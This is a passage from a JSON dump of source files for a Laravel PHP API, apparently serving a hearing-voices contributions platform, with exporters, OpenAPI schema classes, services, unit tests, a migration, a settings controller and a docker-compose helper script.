"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Exporters;\n\nuse Illuminate\\Support\\Facades\\Date;\n\nclass AllExporter extends BaseExporter\n{\n /**\n * @return string\n */\n protected function filename(): string\n {\n return 'all_export_' . Date::now()->format('Y_m_d') . '.zip';\n }\n\n /**\n * @return array\n */\n protected function data(): array\n {\n // TODO: Use actual logic for the \"all\" export.\n\n return [\n ['Heading 1', 'Heading 2'],\n ['John Doe', 1995],\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.5381795763969421,
"alphanum_fraction": 0.5387904644012451,
"avg_line_length": 37.069766998291016,
"blob_id": "9a9bd4c01450a681d6789fa3b6e297dfe9c656ec",
"content_id": "35b57567e38f2fdd7c721b09cf137be1cf4bc394",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1637,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 43,
"path": "/app/Docs/Schemas/Setting/SettingsSchema.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Schemas\\Setting;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass SettingsSchema extends Schema\n{\n /**\n * @param string|null $objectId\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->type(static::TYPE_OBJECT)\n ->properties(\n Schema::object('frontend_content')->properties(\n Schema::object('home_page')->properties(\n // TODO: Fill in from designs.\n Schema::string('title')\n )\n ),\n Schema::object('email_content')->properties(\n Schema::object('admin')->properties(\n EmailContentSchema::create('new_contribution'),\n EmailContentSchema::create('updated_contribution'),\n EmailContentSchema::create('new_end_user'),\n EmailContentSchema::create('password_reset')\n ),\n Schema::object('end_user')->properties(\n EmailContentSchema::create('email_confirmation'),\n EmailContentSchema::create('password_reset'),\n EmailContentSchema::create('contribution_approved'),\n EmailContentSchema::create('contribution_rejected')\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5615127086639404,
"alphanum_fraction": 0.5619913935661316,
"avg_line_length": 35.017242431640625,
"blob_id": "fdaa62e59fba05c4b2f7f54f07fb3033b3cd1a07",
"content_id": "8795ab51b3a3f50f65fdba9ad7efbdefabf077ab",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2089,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 58,
"path": "/app/Docs/Operations/Export/RequestExportOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Export;\n\nuse App\\Docs\\Schemas\\File\\FileDownloadUrlSchema;\nuse App\\Docs\\Schemas\\ResourceSchema;\nuse App\\Docs\\Tags\\ExportsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\nuse Illuminate\\Support\\Facades\\Config;\n\nclass RequestExportOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_POST)\n ->summary('Request a download URL for a specific export')\n ->description(\n Utils::operationDescription(\n [Admin::class],\n sprintf(\n <<<'EOT'\n This returns a download URL which will expire within %d seconds, and can \n only be accessed once.\n EOT,\n Config::get('connecting_voices.file_tokens.expiry_time')\n )\n )\n )\n ->tags(ExportsTag::create())\n ->responses(\n Response::ok()->content(\n MediaType::json()->schema(\n ResourceSchema::create(\n null,\n FileDownloadUrlSchema::create()->properties(\n Schema::string('decryption_key'),\n ...FileDownloadUrlSchema::object()->properties\n )\n )\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6064879894256592,
"alphanum_fraction": 0.607898473739624,
"avg_line_length": 21.15625,
"blob_id": "28a49f1007ce05080f6611ec3fa882ba076658e4",
"content_id": "c515ff31f0c055c0bb83a4400a973ddd4373b3e8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 709,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 32,
"path": "/app/Services/FileService.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Services;\n\nuse App\\Events\\File\\FileRequested;\nuse App\\Models\\Admin;\nuse App\\Models\\File;\nuse App\\Models\\FileToken;\nuse Illuminate\\Support\\Facades\\Date;\n\nclass FileService\n{\n /**\n * @param \\App\\Models\\File $file\n * @param \\App\\Models\\Admin $admin\n * @return \\App\\Models\\FileToken\n */\n public function request(File $file, Admin $admin): FileToken\n {\n /** @var \\App\\Models\\FileToken $fileToken */\n $fileToken = $file->fileTokens()->create([\n 'user_id' => $admin->user_id,\n 'created_at' => Date::now(),\n ]);\n\n event(new FileRequested($file, $fileToken));\n\n return $fileToken;\n }\n}\n"
},
{
"alpha_fraction": 0.5663343667984009,
"alphanum_fraction": 0.56952965259552,
"avg_line_length": 33.31578826904297,
"blob_id": "a948adfbf62debc0da8c219779190926a4644963",
"content_id": "fc0f5d432f45addb54cc8bd786c3682bf05ada98",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 7824,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 228,
"path": "/tests/Unit/Services/EndUserServiceTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Unit\\Services;\n\nuse App\\Events\\EndUser\\EndUserCreated;\nuse App\\Events\\EndUser\\EndUserForceDeleted;\nuse App\\Events\\EndUser\\EndUserSoftDeleted;\nuse App\\Events\\EndUser\\EndUserUpdated;\nuse App\\Models\\Contribution;\nuse App\\Models\\EndUser;\nuse App\\Models\\Tag;\nuse App\\Services\\EndUserService;\nuse Illuminate\\Support\\Facades\\Event;\nuse Illuminate\\Support\\Facades\\Hash;\nuse Tests\\TestCase;\n\nclass EndUserServiceTest extends TestCase\n{\n /** @test */\n public function it_creates_a_user_and_end_user_record(): void\n {\n /** @var \\App\\Services\\EndUserService $endUserService */\n $endUserService = resolve(EndUserService::class);\n\n $endUser = $endUserService->create([\n 'email' => '[email protected]',\n 'password' => 'secret',\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Mixed Asian/White',\n ]);\n\n $this->assertDatabaseHas('users', ['id' => $endUser->user_id]);\n $this->assertDatabaseHas('end_users', ['id' => $endUser->id]);\n $this->assertEquals('[email protected]', $endUser->user->email);\n $this->assertTrue(Hash::check('secret', $endUser->user->password));\n $this->assertEquals('United Kingdom', $endUser->country);\n $this->assertEquals(1995, $endUser->birth_year);\n $this->assertEquals('Male', $endUser->gender);\n $this->assertEquals('Mixed Asian/White', $endUser->ethnicity);\n }\n\n /** @test */\n public function it_dispatches_an_event_when_created(): void\n {\n Event::fake([EndUserCreated::class]);\n\n /** @var \\App\\Services\\EndUserService $endUserService */\n $endUserService = resolve(EndUserService::class);\n\n $endUser = $endUserService->create([\n 'email' => '[email protected]',\n 'password' => 'secret',\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Mixed Asian/White',\n ]);\n\n Event::assertDispatched(\n EndUserCreated::class,\n function (EndUserCreated $event) use ($endUser): bool {\n return $event->getEndUser()->is($endUser);\n }\n );\n }\n\n /** @test */\n public function it_updates_a_user_and_end_user_record(): void\n {\n /** @var \\App\\Services\\EndUserService $endUserService */\n $endUserService = resolve(EndUserService::class);\n\n /** @var \\App\\Models\\EndUser $endUser */\n $endUser = factory(EndUser::class)->create();\n\n $endUser = $endUserService->update($endUser, [\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Mixed Asian/White',\n 'email' => '[email protected]',\n 'password' => 'secret',\n ]);\n\n $this->assertEquals('[email protected]', $endUser->user->email);\n $this->assertTrue(Hash::check('secret', $endUser->user->password));\n $this->assertEquals('United Kingdom', $endUser->country);\n $this->assertEquals(1995, $endUser->birth_year);\n $this->assertEquals('Male', $endUser->gender);\n $this->assertEquals('Mixed Asian/White', $endUser->ethnicity);\n }\n\n /** @test */\n public function it_dispatches_an_event_when_updated(): void\n {\n Event::fake([EndUserUpdated::class]);\n\n /** @var \\App\\Services\\EndUserService $endUserService */\n $endUserService = resolve(EndUserService::class);\n\n /** @var \\App\\Models\\EndUser $endUser */\n $endUser = factory(EndUser::class)->create();\n\n $endUser = $endUserService->update($endUser, [\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Mixed Asian/White',\n 'email' => '[email protected]',\n 'password' => 'secret',\n ]);\n\n Event::assertDispatched(\n EndUserUpdated::class,\n function (EndUserUpdated $event) use ($endUser): bool {\n return $event->getEndUser()->is($endUser);\n }\n );\n }\n\n /** @test */\n public function it_soft_deletes_a_user_record(): void\n {\n /** @var \\App\\Services\\EndUserService $endUserService */\n $endUserService = resolve(EndUserService::class);\n\n /** @var \\App\\Models\\EndUser $endUser */\n $endUser = factory(EndUser::class)->create();\n\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = factory(Contribution::class)->create([\n 'end_user_id' => $endUser->id,\n ]);\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n $contribution->tags()->sync([$tag->id]);\n\n $endUser = $endUserService->softDelete($endUser);\n\n $this->assertDatabaseHas('end_users', ['id' => $endUser->id]);\n $this->assertDatabaseHas('users', ['id' => $endUser->user->id]);\n $this->assertSoftDeleted('users', ['id' => $endUser->user->id]);\n $this->assertNotNull($endUser->user->deleted_at);\n $this->assertDatabaseHas('contributions', ['id' => $contribution->id]);\n $this->assertDatabaseHas('contribution_tag', [\n 'contribution_id' => $contribution->id,\n 'tag_id' => $tag->id,\n ]);\n }\n\n /** @test */\n public function it_dispatches_an_event_when_soft_deleted(): void\n {\n Event::fake([EndUserSoftDeleted::class]);\n\n /** @var \\App\\Services\\EndUserService $endUserService */\n $endUserService = resolve(EndUserService::class);\n\n /** @var \\App\\Models\\EndUser $endUser */\n $endUser = factory(EndUser::class)->create();\n\n $endUser = $endUserService->softDelete($endUser);\n\n Event::assertDispatched(\n EndUserSoftDeleted::class,\n function (EndUserSoftDeleted $event) use ($endUser): bool {\n return $event->getEndUser()->is($endUser);\n }\n );\n }\n\n /** @test */\n public function it_force_deletes_a_user_and_user_user_and_contribution_tag_records(): void\n {\n /** @var \\App\\Services\\EndUserService $endUserService */\n $endUserService = resolve(EndUserService::class);\n\n /** @var \\App\\Models\\EndUser $endUser */\n $endUser = factory(EndUser::class)->create();\n\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = factory(Contribution::class)->create([\n 'end_user_id' => $endUser->id,\n ]);\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n $contribution->tags()->sync([$tag->id]);\n\n $endUserService->forceDelete($endUser);\n\n $this->assertDatabaseMissing('end_users', ['id' => $endUser->id]);\n $this->assertDatabaseMissing('users', ['id' => $endUser->user->id]);\n $this->assertDatabaseMissing('contributions', ['id' => $contribution->id]);\n $this->assertDatabaseMissing('contribution_tag', [\n 'contribution_id' => $contribution->id,\n 'tag_id' => $tag->id,\n ]);\n }\n\n /** @test */\n public function it_dispatches_an_event_when_force_deleted(): void\n {\n Event::fake([EndUserForceDeleted::class]);\n\n /** @var \\App\\Services\\EndUserService $endUserService */\n $endUserService = resolve(EndUserService::class);\n\n /** @var \\App\\Models\\EndUser $endUser */\n $endUser = factory(EndUser::class)->create();\n\n $endUserService->forceDelete($endUser);\n\n Event::assertDispatched(\n EndUserForceDeleted::class,\n function (EndUserForceDeleted $event) use ($endUser): bool {\n return $event->getEndUser()->is($endUser);\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.4716279208660126,
"alphanum_fraction": 0.476279079914093,
"avg_line_length": 21.87234115600586,
"blob_id": "c27b5126ecaedcf21400ce4bc40c1e23265f0f26",
"content_id": "3d274e51ab8fd3a7d628aa8fe0a278ab6f39ad8e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1075,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 47,
"path": "/develop",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\n# Disable pseudo-TTY allocation for CI. The -T flag removes interaction.\nTTY=\"\"\n\n# Travis CI provides a CI environment variable which can be used to check if\n# this is running in a CI environment.\nif [[ ${CI:-false} == \"true\" ]]; then\n TTY=\"-T\"\nfi\n\n# Pass arguments to docker-compose, or default to docker-compose ps.\nif [[ $# -gt 0 ]]; then\n case \"$1\" in\n\n art|artisan )\n shift 1\n docker-compose run --rm ${TTY} \\\n api \\\n php artisan \"$@\"\n ;;\n\n composer )\n shift 1\n docker-compose run --rm ${TTY} \\\n api \\\n composer \"$@\"\n ;;\n\n npm )\n shift 1\n docker-compose run --rm ${TTY} \\\n node \\\n npm \"$@\"\n ;;\n\n cfn|cloudformation )\n docker-compose run --rm troposphere > aws/${CFN_TEMPLATE}.json\n cat aws/${CFN_TEMPLATE}.json\n ;;\n\n * ) docker-compose \"$@\"; ;;\n\n esac\nelse\n docker-compose ps\nfi\n"
},
{
"alpha_fraction": 0.7056737542152405,
"alphanum_fraction": 0.7068557739257812,
"avg_line_length": 29.214284896850586,
"blob_id": "5be54f9f0f5e6d5643a3c31d057895d7975ca5f1",
"content_id": "3ec14aefb202628963f7891b797830439ee79124",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 846,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 28,
"path": "/app/Docs/Paths/Settings/SettingsRootPath.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Paths\\Settings;\n\nuse App\\Docs\\Operations\\Settings\\IndexSettingsOperation;\nuse App\\Docs\\Operations\\Settings\\UpdateSettingsOperation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem;\n\nclass SettingsRootPath extends PathItem\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->route('/settings')\n ->operations(\n IndexSettingsOperation::create(),\n UpdateSettingsOperation::create()\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6103731989860535,
"alphanum_fraction": 0.6110056638717651,
"avg_line_length": 31.9375,
"blob_id": "223d69fcf883fd7d409f6cd0c32f5b818accfa25",
"content_id": "b5e1615afce66a1d3f89536bcf3c1d02a909c870",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1581,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 48,
"path": "/app/Docs/Operations/EndUser/ShowEndUserOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\EndUser;\n\nuse App\\Docs\\Schemas\\EndUser\\EndUserSchema;\nuse App\\Docs\\Schemas\\ResourceSchema;\nuse App\\Docs\\Tags\\EndUsersTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse App\\Models\\EndUser;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\n\nclass ShowEndUserOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_GET)\n ->summary('Get a specific end user')\n ->description(\n Utils::operationDescription(\n [Admin::class, EndUser::class],\n <<<'EOT'\n * If an end user is making the request, then they can only access their own\n end user resource.\n EOT\n )\n )\n ->tags(EndUsersTag::create())\n ->responses(\n Response::ok()->content(\n MediaType::json()->schema(\n ResourceSchema::create(null, EndUserSchema::create())\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5743073225021362,
"alphanum_fraction": 0.5751469135284424,
"avg_line_length": 17.045454025268555,
"blob_id": "bdb7b22fe4a28a452a8301986290879a79dea261",
"content_id": "ff28f944cbec505b59648ca2148c3a1de4acbf35",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1191,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 66,
"path": "/app/Sms/GenericSms.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Sms;\n\nuse Illuminate\\Bus\\Queueable;\nuse Illuminate\\Contracts\\Queue\\ShouldQueue;\nuse Illuminate\\Foundation\\Events\\Dispatchable;\nuse Illuminate\\Queue\\InteractsWithQueue;\nuse Illuminate\\Support\\Facades\\Config;\n\nclass GenericSms implements ShouldQueue\n{\n use Dispatchable;\n use InteractsWithQueue;\n use Queueable;\n\n /**\n * @var string\n */\n protected $to;\n\n /**\n * @var string\n */\n protected $body;\n\n /**\n * Dispatcher constructor.\n *\n * @param string $to\n * @param string $body\n */\n public function __construct(string $to, string $body)\n {\n $this->to = $to;\n $this->body = $body;\n }\n\n /**\n * Dispatch the email as a job to the queue.\n *\n * @param \\App\\Sms\\SmsSender $sender\n */\n public function handle(SmsSender $sender): void\n {\n $sender->send(Config::get('sms.from'), $this->to, $this->body);\n }\n\n /**\n * @return string\n */\n public function getTo(): string\n {\n return $this->to;\n }\n\n /**\n * @return string\n */\n public function getBody(): string\n {\n return $this->body;\n }\n}\n"
},
{
"alpha_fraction": 0.601170539855957,
"alphanum_fraction": 0.6020066738128662,
"avg_line_length": 25.577777862548828,
"blob_id": "512dcc86515cdfe324f093977b8a67fc7e2e3cfe",
"content_id": "1361a4676c25be1e7b63aba2ac7c33664ae75848",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1196,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 45,
"path": "/app/VariableSubstitution/Email/Admin/NewContributionSubstituter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\VariableSubstitution\\Email\\Admin;\n\nuse App\\Models\\Contribution;\nuse App\\VariableSubstitution\\BaseVariableSubstituter;\nuse Illuminate\\Support\\Facades\\Config;\n\nclass NewContributionSubstituter extends BaseVariableSubstituter\n{\n /**\n * @var \\App\\Models\\Contribution\n */\n protected $contribution;\n\n /**\n * NewContribution constructor.\n *\n * @param \\App\\Models\\Contribution $contribution\n */\n public function __construct(Contribution $contribution)\n {\n $this->contribution = $contribution;\n }\n\n /**\n * @return array\n */\n protected function variables(): array\n {\n return [\n 'END_USER_EMAIL' => $this->contribution->endUser->user->email,\n 'CONTRIBUTION_CONTENT' => $this->contribution->content,\n 'CONTRIBUTION_STATUS' => $this->contribution->status,\n 'CONTRIBUTION_CREATED_AT' => $this->contribution->created_at\n ->format(Config::get('connecting_voices.datetime_format')),\n 'TAGS' => $this->contribution\n ->tags()\n ->pluck('name')\n ->implode(', '),\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.64402174949646,
"alphanum_fraction": 0.64673912525177,
"avg_line_length": 17.399999618530273,
"blob_id": "25a1aa0a80afd120740957ced58e604794af0081",
"content_id": "f2982816ea368e2fea146ae116138b805694afcd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 368,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 20,
"path": "/app/Exceptions/RiskyPathException.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Exceptions;\n\nuse RuntimeException;\n\nclass RiskyPathException extends RuntimeException\n{\n /**\n * RiskyPathException constructor.\n *\n * @param string $path\n */\n public function __construct(string $path)\n {\n parent::__construct(\"The path [{$path}] must be within the storage path.\");\n }\n}\n"
},
{
"alpha_fraction": 0.5733015537261963,
"alphanum_fraction": 0.5744934678077698,
"avg_line_length": 24.42424201965332,
"blob_id": "ac64d6cc360f2434c8db79a2deb91b751aab46f2",
"content_id": "60c02fbb09cb94cb2774a21ff608c0f2dfe884c6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 839,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 33,
"path": "/database/migrations/2019_05_29_105621_create_file_tokens_table.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse Illuminate\\Database\\Migrations\\Migration;\nuse Illuminate\\Database\\Schema\\Blueprint;\nuse Illuminate\\Support\\Facades\\Schema;\n\nclass CreateFileTokensTable extends Migration\n{\n /**\n * Run the migrations.\n */\n public function up(): void\n {\n Schema::create('file_tokens', function (Blueprint $table): void {\n $table->uuid('id')->primary();\n $table->uuid('file_id');\n $table->foreign('file_id')->references('id')->on('files');\n $table->uuid('user_id');\n $table->foreign('user_id')->references('id')->on('users');\n $table->timestamp('created_at')->useCurrent();\n });\n }\n\n /**\n * Reverse the migrations.\n */\n public function down(): void\n {\n Schema::dropIfExists('file_tokens');\n }\n}\n"
},
{
"alpha_fraction": 0.649789035320282,
"alphanum_fraction": 0.652601957321167,
"avg_line_length": 25.33333396911621,
"blob_id": "c4109a6755d449a04bf54c1fc21363b598b34812",
"content_id": "eff18f63763ad9d25472ca58f66822b4f13a4e3b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 711,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 27,
"path": "/app/Docs/Parameters/PageParameter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Parameters;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Parameter;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass PageParameter extends Parameter\n{\n /**\n * @param string|null $objectId\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Parameter\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->in(static::IN_QUERY)\n ->name('page')\n ->description('The page offset')\n ->schema(\n Schema::integer()->default(1)\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5259537100791931,
"alphanum_fraction": 0.526370644569397,
"avg_line_length": 38.974998474121094,
"blob_id": "b1240f25c9e3b8ad21a1da56cf9ab4435a1885f9",
"content_id": "2dfe762f3074850a3c40aa5997243b3d01e115b3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 4797,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 120,
"path": "/app/Http/Controllers/V1/SettingController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\V1;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Http\\Controllers\\ApiController;\nuse App\\Http\\Requests\\Setting\\UpdateSettingRequest;\nuse App\\Models\\Setting;\nuse App\\Services\\SettingService;\nuse App\\Support\\Pagination;\nuse Illuminate\\Http\\JsonResponse;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Support\\Facades\\DB;\n\nclass SettingController extends ApiController\n{\n /**\n * @var \\App\\Services\\SettingService\n */\n protected $settingService;\n\n /**\n * SettingController constructor.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Support\\Pagination $pagination\n * @param \\App\\Services\\SettingService $settingService\n */\n public function __construct(\n Request $request,\n Pagination $pagination,\n SettingService $settingService\n ) {\n parent::__construct($request, $pagination);\n\n $this->middleware(['auth:api', 'verified'])->except('index');\n\n $this->settingService = $settingService;\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @throws \\Illuminate\\Auth\\Access\\AuthorizationException\n * @return \\Illuminate\\Http\\JsonResponse\n */\n public function index(Request $request): JsonResponse\n {\n $this->authorize('list', Setting::class);\n\n event(EndpointInvoked::onRead($request, 'Viewed settings.'));\n\n return Setting::toResponse(\n optional($request->user('api'))->isAdmin() ?? false\n );\n }\n\n /**\n * @param \\App\\Http\\Requests\\Setting\\UpdateSettingRequest $request\n * @throws \\Illuminate\\Auth\\Access\\AuthorizationException\n * @return \\Illuminate\\Http\\JsonResponse\n */\n public function update(UpdateSettingRequest $request): JsonResponse\n {\n $this->authorize('update', Setting::class);\n\n DB::transaction(function () use ($request): void {\n $this->settingService->update([\n 'frontend_content' => [\n 'home_page' => [\n 'title' => $request->input('frontend_content.home_page.title'),\n ],\n ],\n 'email_content' => [\n 'admin' => [\n 'new_contribution' => [\n 'subject' => $request->input('email_content.admin.new_contribution.subject'),\n 'body' => $request->input('email_content.admin.new_contribution.body'),\n ],\n 'updated_contribution' => [\n 'subject' => $request->input('email_content.admin.updated_contribution.subject'),\n 'body' => $request->input('email_content.admin.updated_contribution.body'),\n ],\n 'new_end_user' => [\n 'subject' => $request->input('email_content.admin.new_end_user.subject'),\n 'body' => $request->input('email_content.admin.new_end_user.body'),\n ],\n 'password_reset' => [\n 'subject' => $request->input('email_content.admin.password_reset.subject'),\n 'body' => $request->input('email_content.admin.password_reset.body'),\n ],\n ],\n 'end_user' => [\n 'email_confirmation' => [\n 'subject' => $request->input('email_content.end_user.email_confirmation.subject'),\n 'body' => $request->input('email_content.end_user.email_confirmation.body'),\n ],\n 'password_reset' => [\n 'subject' => $request->input('email_content.end_user.password_reset.subject'),\n 'body' => $request->input('email_content.end_user.password_reset.body'),\n ],\n 'contribution_approved' => [\n 'subject' => $request->input('email_content.end_user.contribution_approved.subject'),\n 'body' => $request->input('email_content.end_user.contribution_approved.body'),\n ],\n 'contribution_rejected' => [\n 'subject' => $request->input('email_content.end_user.contribution_rejected.subject'),\n 'body' => $request->input('email_content.end_user.contribution_rejected.body'),\n ],\n ],\n ],\n ]);\n });\n\n event(EndpointInvoked::onUpdate($request, 'Updated settings.'));\n\n return Setting::toResponse(Setting::WITH_PRIVATE);\n }\n}\n"
},
{
"alpha_fraction": 0.7176981568336487,
"alphanum_fraction": 0.7187839150428772,
"avg_line_length": 30.758621215820312,
"blob_id": "f2d8a927a17ec79681682e44d200dcaa12ed9863",
"content_id": "d16f4533de93094915d68ac1eb7274d69741bf04",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 921,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 29,
"path": "/app/Docs/Paths/Contributions/ContributionsRootPath.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Paths\\Contributions;\n\nuse App\\Docs\\Operations\\Contributions\\IndexContributionOperation;\nuse App\\Docs\\Operations\\Contributions\\StoreContributionOperation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem;\n\nclass ContributionsRootPath extends PathItem\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @throws \\ReflectionException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->route('/contributions')\n ->operations(\n IndexContributionOperation::create(),\n StoreContributionOperation::create()\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5966386795043945,
"alphanum_fraction": 0.5978391170501709,
"avg_line_length": 25.03125,
"blob_id": "ab264763fe47d19f2eae6fc224825194da28cb67",
"content_id": "90024d263273fb0325a218f7eb5f3a24246083cd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 833,
"license_type": "permissive",
"max_line_length": 86,
